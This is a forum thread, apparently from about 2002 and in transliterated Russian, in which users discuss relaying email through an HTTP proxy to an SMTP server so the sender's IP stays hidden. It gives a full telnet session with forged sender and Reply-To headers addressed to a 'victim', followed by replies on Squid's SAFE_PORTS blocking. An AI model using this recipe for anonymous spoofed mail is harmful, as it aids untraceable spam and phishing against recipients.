[dolphin]

Nedavno ja obnarujil sposob otsylat' polnostju anonymnye pis'ma, to est' bez registracii IP otpravitelja cherez http proxy server (tested on squid). IP otpravitelja budet IP proxy servera. Esli proxy ne derjit logov to vychislit' optpravitelja nevozmojno.

vot, chto sobstvenno nujno sdelat:

~$ telnet some.proxy.server.net 3128
Connected to some.proxy.server.net (127.128.129.1).
Escape character is '^]'.
POST some.smtp.server.net[/i]:25/]http://some.smtp.server.net:25/ HTTP/1.0
Content-length: 4096

helo gago
mail from: [email protected]
rcpt to: [email protected]
data
From: gago<[email protected]>
To: victim<[email protected]>
Reply-To: "Bill Gates"<[email protected]>
Subject: Have fun



This letter will be sent anonymously!

blah-blah-blah....


.


^]

telnet> q
Connection closed.

-----------------------------------

gde:

some.proxy.server.net - proxy, cherez kotoryj budet posylatsja pis'mo

some.smtp.server.net - smtp server, kotoryj, naprimer, obslujivaet [email protected] ili ljuboj smtp server, kotoryj pozvolit relay.

[email protected] - adres otpravitelja

[email protected] - adres poluchatelja

Rekomendacii:

Viderjat' pauzu posle "Content-length:", chtoby smtp server uspel rugnutsja na neponjatnye emu http headery.

4096 - chislo byte v pis'me, vkljuchaja headery, doljno xotja-by prevyshat' real'noe chislo byte.

Krome perechislennyx headerov posle "data" mojno vkjuchat' ljubye mail headery, ili ne ispol'zovat' nikakix

Dumaju budet neslojno napisat' script ili progu, kotoraja budet otsylat' pochtu takim obrazom.

[stealth]

С нормально настроеным сквидом, который переадресует только хттп и фтп случается следующее..
==============================================
Napalm:~$ telnet 192.168.65.1 3128
Trying 192.168.65.1...
Connected to 192.168.65.1.
Escape character is '^]'.
POST http://napalm.never.land.am:25/ HTTP/1.0
Content-length: 4096

HTTP/1.0 403 Forbidden
Server: Squid/2.4.STABLE4
Mime-Version: 1.0
Date: Wed, 11 Sep 2002 10:28:10 GMT
Content-Type: text/html
Content-Length: 771
Expires: Wed, 11 Sep 2002 10:28:10 GMT
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from Proxy.Never.Land.AM
Proxy-Connection: close
ERROR: The requested URL could not be retrieved
<H1>ERROR</H1>
<H2>The requested URL could not be retrieved</H2>
<HR>
<P>
While trying to retrieve the URL:
<A HREF="http://napalm.never.land.am:25/">http://napalm.never.land.am:25/</A>
<P>
The following error was encountered:
<UL>
<LI>
<STRONG>
Access Denied.
</STRONG>
<P>

==============================================

А вообще идея отличная!
Good job!

[dolphin]

stealth <<

hm.. tvoj proxy rugnulsja ne na sam zapros, a na IP, s kotorogo k nemu obratilis'. Tak on-by otreagiroval na ljuboj zapros. Prover' http_allow v squid.conf

[VX]

Quote:

Originally posted by DolphiN:
stealth <<

hm.. tvoj proxy rugnulsja ne na sam zapros, a na IP, s kotorogo k nemu obratilis'. Tak on-by otreagiroval na ljuboj zapros. Prover' http_allow v squid.conf

Dolphin v squide napisanno deny !SAFE_PORTS, vot.. ))

[dolphin]

vx << a ty otkuda znaesh'?

all << slovom eta shtuka proverena i rabotaet na proxy serverax, kotorye a) pozvoljajut konnectitsja k nim. b) pozvoljajut delat' zaprosy k nujnym vam smtp serveram i k ix 25-ym portam

[stealth]

Долф, если ты конечно обратил внимание - запрос шёл на нереальный АЙПИ адрес, то есть логично, что запрос шёл так же с нереального ..
Неужели ты подумал, что я запретил доступ для своей внутренней сетки???
))

[dolphin]

vx >> "Dolphin v squide napisanno deny !SAFE_PORTS, vot.. ))"

stealth << ne znaju mojet i zaprretil
A na samom dele vx prav, tvoj proxy ne puskaet connectitsja k nestandartnym http portam, tak chto otkryvaj dostup k !SAFE_PORTS i vpered

[petar]

Moderator: Message byl stert iz-za offtpica